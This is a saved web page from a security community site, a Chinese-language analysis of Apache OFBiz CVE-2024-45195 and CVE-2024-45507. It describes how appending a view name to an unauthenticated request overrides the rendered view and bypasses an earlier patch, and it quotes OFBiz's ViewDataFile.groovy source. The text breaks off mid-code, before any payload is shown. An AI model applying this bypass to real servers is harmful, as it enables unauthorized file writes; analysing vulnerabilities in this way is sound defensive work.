<!DOCTYPE html> <html lang=en><!--
Page saved with SingleFile
url: https://xz.aliyun.com/t/15569
--><meta charset=utf-8>
<title>浅析Apache Ofbiz CVE-2024-45195 & CVE-2024-45507</title>
<meta name=description content=先知社区,先知安全技术社区>
<meta name=viewport content="width=device-width,initial-scale=1.0,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no">
<style>/*!
* Bootstrap v2.3.1
*
* Copyright 2012 Twitter, Inc
* Licensed under the Apache License v2.0
* http://www.apache.org/licenses/LICENSE-2.0
*
* Designed and built with all the love in the world @twitter by @mdo and @fat.
*/.clearfix:before,.clearfix:after{display:table;line-height:0;content:""}.clearfix:after{clear:both}footer{display:block}html{font-size:100%;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}a:focus{outline:thin dotted #333;outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}a:hover,a:active{outline:0}img{height:auto;vertical-align:middle;-ms-interpolation-mode:bicubic}input{margin:0}button{-webkit-appearance:button}body{margin:0;font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;line-height:20px;color:#333}a{text-decoration:none}a:hover,a:focus{color:#005580;text-decoration:underline}.row:before,.row:after{display:table;line-height:0;content:""}.row:after{clear:both}.container{width:940px}.span10{width:780px}.container{margin-right:auto;margin-left:auto}.container:before,.container:after{display:table;line-height:0;content:""}.container:after{clear:both}p{margin:0 0 10px}strong{font-weight:bold}.text-right{text-align:right}.text-center{text-align:center}h1,h2,h4{margin:10px 0;font-family:inherit;font-weight:bold;line-height:20px;color:inherit;text-rendering:optimizelegibility}h4{font-size:17.5px}ul{padding:0}hr{margin:20px 0;border:0;border-top:1px solid #eee;border-bottom:1px solid #fff}code,pre{color:#333;-webkit-border-radius:3px;-moz-border-radius:3px}code{color:#d14}pre{display:block;margin:0 0 10px;word-break:break-all;white-space:pre-wrap;border:1px solid rgba(0,0,0,0.15);-webkit-border-radius:4px;-moz-border-radius:4px}pre code{color:inherit}input{font-weight:normal}input{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif}input[type="text"]{display:inline-block;padding:4px 6px;margin-bottom:10px;font-size:14px;line-height:20px;vertical-align:middle;-webkit-border-radius:4px;-moz-border-radius:4px}input{width:206px}input[type="text"]{background-color:#fff;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075);-moz-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075);box-shadow:inset 0 1px 1px 
rgba(0,0,0,0.075);-webkit-transition:border linear .2s,box-shadow linear .2s;-moz-transition:border linear .2s,box-shadow linear .2s;-o-transition:border linear .2s,box-shadow linear .2s;transition:border linear .2s,box-shadow linear .2s}textarea:focus,input[type="text"]:focus,input[type="password"]:focus,input[type="datetime"]:focus,input[type="datetime-local"]:focus,input[type="date"]:focus,input[type="month"]:focus,input[type="time"]:focus,input[type="week"]:focus,input[type="number"]:focus,input[type="email"]:focus,input[type="url"]:focus,input[type="search"]:focus,input[type="tel"]:focus,input[type="color"]:focus,.uneditable-input:focus{border-color:rgba(82,168,236,0.8);outline:0;outline:thin dotted \9;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 8px rgba(82,168,236,0.6);-moz-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 8px rgba(82,168,236,0.6);box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 8px rgba(82,168,236,0.6)}input::-webkit-input-placeholder,textarea::-webkit-input-placeholder{color:#999}input{margin-left:0}input:focus:invalid,textarea:focus:invalid,select:focus:invalid{color:#b94a48;border-color:#ee5f5b}input:focus:invalid:focus,textarea:focus:invalid:focus,select:focus:invalid:focus{border-color:#e9322d;-webkit-box-shadow:0 0 6px #f8b9b7;-moz-box-shadow:0 0 6px #f8b9b7;box-shadow:0 0 6px #f8b9b7}.fade{opacity:0;-webkit-transition:opacity .15s linear;-moz-transition:opacity .15s linear;-o-transition:opacity .15s linear}.collapse{position:relative;-webkit-transition:height .35s ease;-moz-transition:height .35s ease;-o-transition:height .35s ease;transition:height .35s ease}.btn{text-shadow:0 1px 1px rgba(255,255,255,0.75);vertical-align:middle;background-image:-moz-linear-gradient(top,#fff,#e6e6e6);background-image:-webkit-gradient(linear,0 0,0 100%,from(#fff),to(#e6e6e6));background-image:-webkit-linear-gradient(top,#fff,#e6e6e6);background-image:-o-linear-gradient(top,#fff,#e6e6e6);background-repeat:repeat-x;border:1px solid 
#ccc;border-bottom-color:#b3b3b3;-webkit-border-radius:4px;-moz-border-radius:4px;-webkit-box-shadow:inset 0 1px 0 rgba(255,255,255,0.2),0
<style>/*! Editor.md v1.5.0 | editormd.min.css | Open source online markdown editor. | MIT License | By: Pandao | https://github.com/pandao/editor.md | 2015-06-09 *//*! prefixes.scss v0.1.0 | Author: Pandao | https://github.com/pandao/prefixes.scss | MIT license | Copyright (c) 2015 */@media only screen and (-webkit-min-device-pixel-ratio:2),only screen and (min-device-pixel-ratio:2){}@media only screen and (-webkit-min-device-pixel-ratio:3),only screen and (min-device-pixel-ratio:3){}/*! prefixes.scss v0.1.0 | Author: Pandao | https://github.com/pandao/prefixes.scss | MIT license | Copyright (c) 2015 *//*!
* Font Awesome 4.3.0 by @davegandy - http://fontawesome.io - @fontawesome
* License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License)
*/@font-face{font-family:FontAwesome;src:url(data:font/woff2;base64,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
<style>/*!
* Bootstrap Responsive v2.3.1
*
* Copyright 2012 Twitter, Inc
* Licensed under the Apache License v2.0
* http://www.apache.org/licenses/LICENSE-2.0
*
* Designed and built with all the love in the world @twitter by @mdo and @fat.
*/.clearfix:before,.clearfix:after{display:table;line-height:0;content:""}.clearfix:after{clear:both}@-ms-viewport{width:device-width}@media (min-width:768px) and (max-width:979px){}@media (max-width:767px){}@media (min-width:1200px){.row{margin-left:-30px}.row:before,.row:after{display:table;line-height:0;content:""}.row:after{clear:both}[class*="span"]{float:left;min-height:1px;margin-left:30px}.container{width:1170px}.span10{width:970px}input{margin-left:0}}@media (min-width:768px) and (max-width:979px){.row{margin-left:-20px}.row:before,.row:after{display:table;line-height:0;content:""}.row:after{clear:both}[class*="span"]{float:left;min-height:1px;margin-left:20px}.container{width:724px}.span10{width:600px}input{margin-left:0}}@media (max-width:767px){body{padding-right:0px;padding-left:0px}.container{width:auto}.row{margin-left:0}[class*="span"]{display:block;float:none;width:100%;margin-left:0;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}.modal{position:fixed;right:20px;left:20px;width:auto;margin:0}.modal.fade{top:-100px}}@media (max-width:480px){.nav-collapse{-webkit-transform:translate3d(0,0,0)}.modal{top:10px;right:10px;left:10px}}@media (max-width:979px){body{padding-top:0}.navbar .container{width:auto;padding:0}.navbar .brand{padding-right:10px;padding-left:10px}.nav-collapse{clear:both}.nav-collapse.collapse{height:0;overflow:hidden}}@media (min-width:980px){.nav-collapse.collapse{height:auto!important;overflow:visible!important}}</style>
<style>li{line-height:26px}a:hover{text-decoration:none}.post-user-action>span{margin-right:10px;line-height:21px;border:none}.post-user-action .i-seprator{color:rgba(0,0,0,0.1);margin:0 2px}.navbar .brand{padding:0;height:50px;margin-left:0;display:inline-block!important;background-repeat:no-repeat;width:120px;background-size:207px 50px;background-image:url(data:image/svg+xml;base64,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)}.brand-box{position:absolute}.related-section{min-height:42px;padding:5px 0;margin-top:25px;border-top:1px solid #eee}.related-section>.relate
<style>a{color:#778087}.topic-list p{margin:0 0 0 0}.topic-content{min-height:40px}.collapse form{position:relative;width:300px;float:right}div.search{padding:10px 0}.d1 input{height:20px;padding-left:18px;border:1px solid #ddd;border-radius:15px;outline:none;background:#ffffff;color:#9E9C9C;float:right}.vote{font-weight:normal;margin-left:6px}.topic-list{word-break:break-all;word-wrap:break-word}ul{margin:0 0 10px 0}/*!*border-bottom: solid #eee 1px;*!*/.user-info{padding:5px 0 5px 0}.topic-info a,.topic-info{padding-top:5px}.topic-info a:hover{text-decoration:solid}.reminder{min-height:200px;border:1px #ddd solid;border-radius:3px;line-height:200px;text-align:center}</style>
<style>body{background-color:#eee}form{margin:0!important}a:focus{text-decoration:none}.markdown-body p>code{white-space:normal;word-break:break-all;border:none!important}.box ul,ol{margin-bottom:0px!important}.markdown-body ul{list-style-type:disc}.markdown-body ul{margin:0 0 24px 0!important}.box a:hover{text-decoration:none}.box-container>ul>li{list-style-type:none}#Wrapper .row.box{margin-left:0px}.navbar-inner{border-radius:0px;min-height:40px;padding-right:0px;padding-left:0px;outline:none;margin-bottom:0;list-style:none;z-index:1050;background:#fff;-webkit-box-shadow:0 1px 4px rgba(0,21,41,0.08);box-shadow:0 1px 4px rgba(0,21,41,0.08);line-height:46px;-webkit-transition:background .3s,width .2s;-o-transition:background .3s,width .2s;transition:background .3s,width .2s}.bs-docs-footer{text-align:left;color:#99979c;height:64px;background-color:#FFF;border-top:1px solid rgba(0,0,0,0.22);line-height:64px}.bs-docs-footer .links>a{display:inline-block;padding:0 12px;border-left:1px solid #e8e8e8;color:#8c8c8c;line-height:1}.bs-docs-footer .links>a:first-child{border-left:none}.box-container .user-info{margin-bottom:10px;background:#fff}.content-title{font-size:24px;color:#333;text-decoration:none;line-height:24px;text-shadow:0 1px 0#fff}.markdown-body h1,.markdown-body h2{border-bottom:none}.box-container{padding:20px}.breadcrumb{padding:8px 10px 8px 15px;margin-bottom:10px;border-radius:0;color:#000;background-color:#fff}.breadcrumb>li{text-shadow:none!important;margin:2px 0px}.active{text-shadow:none!important}.breadcrumb .active{color:#555;display:inline-block;text-shadow:none!important}.label{background-color:#f4f4f4;line-height:12px;display:inline-block;padding:4px 4px 4px 4px;-moz-border-radius:2px;-webkit-border-radius:2px;border-radius:2px;text-decoration:none;text-shadow:none;font-weight:normal}.topic-info{color:#999!important;font-size:12px!important}.topic-info a{padding:0px;color:#555!important;font-size:12px!important}.topic-info 
a:hover{color:#4d5256;text-decoration:underline}.topic-info .cell{padding-left:0!important;margin-left:0px;font-size:10px;font-weight:bold}.markdown-body img{max-width:90%!important;text-align:center;margin-left:auto;margin-right:auto;display:block;padding:10px 0px 10px 0px}.topic-info span{margin-left:0px;font-size:10px;color:rgba(0,0,0,0.45)}.btn{display:inline-block;padding:4px 12px;margin-bottom:0;font-size:14px;line-height:20px;background-color:#f4f4f4;color:#444;border-color:#ddd;font-family:"Helvetica Neue For Number",-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"PingFang SC","Hiragino Sans GB","Microsoft YaHei","Helvetica Neue",Helvetica,Arial,sans-serif;-webkit-box-sizing:border-box;box-sizing:border-box;margin:0;list-style:none;font-weight:400;text-align:center;cursor:pointer;background-image:none;white-space:nowrap;border-radius:2px;height:32px;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none}.box{font-family:Monospaced Number,Chinese Quote,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,PingFang SC,Hiragino Sans GB,Microsoft YaHei,Helvetica Neue,Helvetica,Arial,sans-serif;font-size:14px;line-height:1.5;color:rgba(0,0,0,0.65);-webkit-box-sizing:border-box;box-sizing:border-box;margin-top:0!important;margin-bottom:20px;padding:0;list-style:none;background:#fff;border-radius:2px;position:relative;-webkit-transition:all .3s;-o-transition:all .3s;transition:all .3s;-moz-box-shadow:0 1px 1px rgba(0,0,0,0.15);-webkit-box-shadow:0 1px 1px rgba(143,168,191,.35);box-shadow:0 1px 1px rgba(143,168,191,.35);border-bottom:1px solid #e2e2e9}.span10{float:left;min-height:1px}#Wrapper .span10{margin-left:0px!important;max-width:960px}@media (min-width:1200px){.container{width:82%!important}}@media screen and (min-width:1500px){#Wrapper.container,.navbar .navbar-inner .container,.bs-docs-footer .container{max-width:1100px!important}#Wrapper .span10{max-width:810px!important}}@media screen and (min-width:980px) and 
(max-width:1499px){#Wrapper.container,.navbar .navbar-inner .container,.bs-docs-footer .container{max-width:1100px!important}#Wrapper .span10{max-wid
<style>/*! prefixes.scss v0.1.0 | Author: Pandao | https://github.com/pandao/prefixes.scss | MIT license | Copyright (c) 2015 */@media only screen and (-webkit-min-device-pixel-ratio:2),only screen and (min-device-pixel-ratio:2){}@media only screen and (-webkit-min-device-pixel-ratio:3),only screen and (min-device-pixel-ratio:3){}/*! prefixes.scss v0.1.0 | Author: Pandao | https://github.com/pandao/prefixes.scss | MIT license | Copyright (c) 2015 *//*!
* Font Awesome 4.3.0 by @davegandy - http://fontawesome.io - @fontawesome
* License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License)
*/@font-face{font-family:"FontAwesome";src:url(data:font/woff2;base64,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
<style>.highlight .k{color:#204a87;font-weight:bold}.highlight .l{color:#000000}.highlight .n{color:#000000}.highlight .o{color:#ce5c00;font-weight:bold}.highlight .cp{color:#8f5902;font-style:italic}.highlight .c1{color:#8f5902;font-style:italic}.highlight .kc{color:#204a87;font-weight:bold}.highlight .kd{color:#204a87;font-weight:bold}.highlight .kn{color:#204a87;font-weight:bold}.highlight .kr{color:#204a87;font-weight:bold}.highlight .kt{color:#204a87;font-weight:bold}.highlight .m{color:#0000cf;font-weight:bold}.highlight .s{color:#4e9a06}.highlight .na{color:#c4a000}.highlight .nf{color:#000000}.highlight .nn{color:#000000}.highlight .nt{color:#204a87;font-weight:bold}</style>
<style>@-webkit-keyframes a{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@keyframes a{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@media (max-width:800px){}</style>
<!--[if lte IE 8]>
<script src="http://code.jquery.com/jquery-1.11.3.min.js"></script>
<![endif]-->
<!--[if !IE]> -->
<style>#waf_nc_block{position:fixed;width:100%;height:100%;top:0;bottom:0;left:0;z-index:99999}</style><style data-id=immersive-translate-input-injected-css>@-webkit-keyframes immersive-translate-loading-animation{from{-webkit-transform:rotate(0deg)}to{-webkit-transform:rotate(359deg)}}@keyframes immersive-translate-loading-animation{from{transform:rotate(0deg)}to{transform:rotate(359deg)}}@keyframes immersiveTranslateShadowRolling{0%{box-shadow:0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0)}12%{box-shadow:100px 0 var(--loading-color),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0)}25%{box-shadow:110px 0 var(--loading-color),100px 0 var(--loading-color),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0)}36%{box-shadow:120px 0 var(--loading-color),110px 0 var(--loading-color),100px 0 var(--loading-color),0px 0 rgba(255,255,255,0)}50%{box-shadow:130px 0 var(--loading-color),120px 0 var(--loading-color),110px 0 var(--loading-color),100px 0 var(--loading-color)}62%{box-shadow:200px 0 rgba(255,255,255,0),130px 0 var(--loading-color),120px 0 var(--loading-color),110px 0 var(--loading-color)}75%{box-shadow:200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),130px 0 var(--loading-color),120px 0 var(--loading-color)}87%{box-shadow:200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),130px 0 var(--loading-color)}100%{box-shadow:200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0)}}@media screen and (max-width:768px){}@media screen and (max-width:768px){}</style><meta name=referrer content=no-referrer><link rel=icon href="data:image/x-icon;base64,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" type=image/x-icon><style>.sf-hidden{display:none!important}</style><link rel=canonical href="https://xz.aliyun.com/t/15569?time__1311=Gqjxn7iti%3DiQoGNDQ0KBKGQeQtODuA%3DjWoD"><meta 
http-equiv=content-security-policy content="default-src 'none'; font-src 'self' data:; img-src 'self' data:; style-src 'unsafe-inline'; media-src 'self' data:; script-src 'unsafe-inline' data:; object-src 'self' data:; frame-src 'self' data:;"><style>img[src="data:,"],source[src="data:,"]{display:none!important}</style></head>
<body>
<div class="navbar navbar-default">
<div class=navbar-inner>
<div class=container style=text-align:center;position:relative>
<!--[if lte IE 8]>
<span style="display:inline-block;margin:0 auto;color:red;">为了更好的体验,请使用IE10及以上版本</span>
<![endif]-->
<div class=brand-box>
<a class=brand href=https://xz.aliyun.com/tab/1></a>
</div>
<a href="https://account.aliyun.com/login/login.htm?oauth_callback=https%3A%2F%2Fxz.aliyun.com%2Ft%2F15569&from_type=xianzhi" class="pull-right anonymous-user hh_loding sf-hidden">
登录</a>
<div class="nav-collapse collapse">
<div class="search d1 text-right">
<form action=/search>
<input type=text placeholder=搜索 name=keyword value>
</form>
</div>
</div>
</div>
</div>
</div>
<div id=Wrapper class=container>
<div class=row2>
<div class=span10>
<div class="row box content" width="1200px !important" style=width:1200px>
<div class=box-container>
<div class=main-topic>
<div class="clearfix user-info topic-list">
<p><span class=content-title>浅析Apache Ofbiz CVE-2024-45195 & CVE-2024-45507</span>
</p>
<div class=topic-info>
<span class=info-left>
<a href=https://xz.aliyun.com/u/29956>
<span class="username cell"> co_w****</span></a> <span class=i-seprator> / </span>
<span> 2024-09-09 11:03:00</span><span class=i-seprator> / </span>
<span>发表于湖北 / </span>
<span>浏览数 81</span>
<span class=content-node>
<span class="label label-default label-node-first">
<a href=https://xz.aliyun.com/tab/4>社区板块</a></span>
<span class="label label-default">
<a href=https://xz.aliyun.com/node/1>漏洞分析</a></span>
</span>
</span>
<span class="pull-right t-vote cell info-right"><a class="vote vote-up" href=javascript:void(0)>
顶(0)</a>
<a class="vote vote-down" href=javascript:void(0)>
踩(0)</a></span>
</div>
</div>
<hr>
<div id=topic_content class="topic-content markdown-body">
<h1 id=toc-0>浅析Apache Ofbiz CVE-2024-45195 & CVE-2024-45507</h1>
<p>漏洞通告链接:</p>
<ul>
<li><a href=https://nvd.nist.gov/vuln/detail/CVE-2024-45195 target=_blank>https://nvd.nist.gov/vuln/detail/CVE-2024-45195</a></li>
<li><a href=https://nvd.nist.gov/vuln/detail/CVE-2024-45507 target=_blank>https://nvd.nist.gov/vuln/detail/CVE-2024-45507</a></li>
</ul>
<h2 id=toc-1>CVE-2024-45195</h2>
<p>这个漏洞和之前的CVE-2024-38856原理相同:在无需认证(unauth)的controller请求后面追加一个视图名,即可覆盖最终渲染的视图。CVE-2024-38856的修复只是直接给<code>ProgramExport</code>这一个视图加了权限校验,视图可被覆盖的问题本身并没有解决,所以<code>CVE-2024-45195</code>换了另一个能写文件的<code>screen</code>就再次绕过了修复。该<code>screen</code>对应的<code>groovy</code>文件为ViewDataFile.groovy,内容如下:</p>
<div class=highlight><pre><span></span><span class=kn>import</span> <span class=nn>java.util.*</span>
<span class=kn>import</span> <span class=nn>java.net.*</span>
<span class=kn>import</span> <span class=nn>org.apache.ofbiz.security.*</span>
<span class=kn>import</span> <span class=nn>org.apache.ofbiz.base.util.*</span>
<span class=kn>import</span> <span class=nn>org.apache.ofbiz.datafile.*</span>
<span class=n>uiLabelMap</span> <span class=o>=</span> <span class=n>UtilProperties</span><span class=o>.</span><span class=na>getResourceBundleMap</span><span class=o>(</span><span class=s>"WebtoolsUiLabels"</span><span class=o>,</span> <span class=n>locale</span><span class=o>)</span>
<span class=n>messages</span> <span class=o>=</span> <span class=o>[]</span>
<span class=n>dataFileSave</span> <span class=o>=</span> <span class=n>request</span><span class=o>.</span><span class=na>getParameter</span><span class=o>(</span><span class=s>"DATAFILE_SAVE"</span><span class=o>)</span>
<span class=n>entityXmlFileSave</span> <span class=o>=</span> <span class=n>request</span><span class=o>.</span><span class=na>getParameter</span><span class=o>(</span><span class=s>"ENTITYXML_FILE_SAVE"</span><span class=o>)</span>
<span class=n>dataFileLoc</span> <span class=o>=</span> <span class=n>request</span><span class=o>.</span><span class=na>getParameter</span><span class=o>(</span><span class=s>"DATAFILE_LOCATION"</span><span class=o>)</span>
<span class=n>definitionLoc</span> <span class=o>=</span> <span class=n>request</span><span class=o>.</span><span class=na>getParameter</span><span class=o>(</span><span class=s>"DEFINITION_LOCATION"</span><span class=o>)</span>
<span class=n>definitionName</span> <span class=o>=</span> <span class=n>request</span><span class=o>.</span><span class=na>getParameter</span><span class=o>(</span><span class=s>"DEFINITION_NAME"</span><span class=o>)</span>
<span class=n>dataFileIsUrl</span> <span class=o>=</span> <span class=kc>null</span> <span class=o>!=</span> <span class=n>request</span><span class=o>.</span><span class=na>getParameter</span><span class=o>(</span><span class=s>"DATAFILE_IS_URL"</span><span class=o>)</span>
<span class=n>definitionIsUrl</span> <span class=o>=</span> <span class=kc>null</span> <span class=o>!=</span> <span class=n>request</span><span class=o>.</span><span class=na>getParameter</span><span class=o>(</span><span class=s>"DEFINITION_IS_URL"</span><span class=o>)</span>
<span class=k>try</span> <span class=o>{</span>
<span class=n>dataFileUrl</span> <span class=o>=</span> <span class=n>dataFileIsUrl</span><span class=o>?</span><span class=k>new</span> <span class=n>URL</span><span class=o>(</span><span class=n>dataFileLoc</span><span class=o>):</span><span class=n>UtilURL</span><span class=o>.</span><span class=na>fromFilename</span><span class=o>(</span><span class=n>dataFileLoc</span><span class=o>)</span>
<span class=o>}</span>
<span class=k>catch</span> <span class=o>(</span><span class=n>java</span><span class=o>.</span><span class=na>net</span><span class=o>.</span><span class=na>MalformedURLException</span> <span class=n>e</span><span class=o>)</span> <span class=o>{</span>
<span class=n>messages</span><span class=o>.</span><span class=na>add</span><span class=o>(</span><span class=n>e</span><span class=o>.</span><span class=na>getMessage</span><span class=o>())</span>
<span class=o>}</span>
<span class=k>try</span> <span class=o>{</span>
<span class=n>definitionUrl</span> <span class=o>=</span> <span class=n>definitionIsUrl</span><span class=o>?</span><span class=k>new</span> <span class=n>URL</span><span class=o>(</span><span class=n>definitionLoc</span><span class=o>):</span><span class=n>UtilURL</span><span class=o>.</span><span class=na>fromFilename</span><span class=o>(</span><span class=n>definitionLoc</span><span class=o>)</span>
<span class=o>}</span>
<span class=k>catch</span> <span class=o>(</span><span class=n>java</span><span class=o>.</span><span class=na>net</span><span class=o>.</span><span class=na>MalformedURLException</span> <span class=n>e</span><span class=o>)</span> <span class=o>{</span>
